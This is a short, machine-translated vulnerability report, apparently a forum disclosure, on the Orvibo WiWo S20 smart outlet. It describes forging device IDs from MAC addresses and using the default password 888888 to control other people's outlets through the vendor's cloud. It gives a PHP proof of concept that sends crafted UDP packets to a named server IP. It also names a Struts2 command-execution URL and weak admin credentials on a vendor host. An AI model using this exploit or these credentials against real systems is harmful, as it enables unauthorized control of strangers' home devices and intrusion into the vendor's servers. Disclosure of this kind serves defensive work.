Smart Home can remotely control devices of other people's homes.
I like your design and admire the magic design of smart config,
But it's a little worse.
Oribo WiWo s20 smart Outlet
Protocol Analysis:
Control Switch
Uid = MAC + 0x202020202020
MAC address scan BSSID
Between Different CIDR blocks:
Attacker (counterfeit UID + default password 888888)-> cloud server
Cloud server> attacker (two UDP response packets)
Attacker (UDP operation code)-> cloud server
Cloud server (UDP operation code)-> Control Device
You only need to know the mac address and password of other people (most of them are default, do not believe the following) to control others' devices.
Code:
<? Php
$ Fp = fsockopen ('udp: // 42.121.111.208 ', 10000 );
$ Send = pack ('H * ', 'xxxxxxxx36caccf2108bc4202020202020383838383820202020202020 ');
Fwrite ($ fp, $ send );
$ Recv = fread ($ fp, 8192 );
$ Send = pack ('H * ', '686400176463accf21_bc420202020206b0000000000 ');
$ Send [18] = $ recv [18];
$ Send [22] = $ recv [23] = chr (0 )? Chr (1): chr (0 );
Fwrite ($ fp, $ send );
$ Recv = fread ($ fp, 8192 );
The combination of cloud vulnerabilities becomes terrible .........
Http://vicenter.orvibo.com: 20001/struts2 Command Execution ah
Weak administrator password. usernames are both 123456 and 123456.
So
Remote debug...
No mac address yet
Don't worry
I'm talking about weak passwords.
383838383838 hex 888888
You can locally send commands to the cloud for the cloud to forward to devices.
You can also directly send commands to devices on the cloud.
Of course, there are still a lot of firmware. Your infrared code and other firmware are leaked.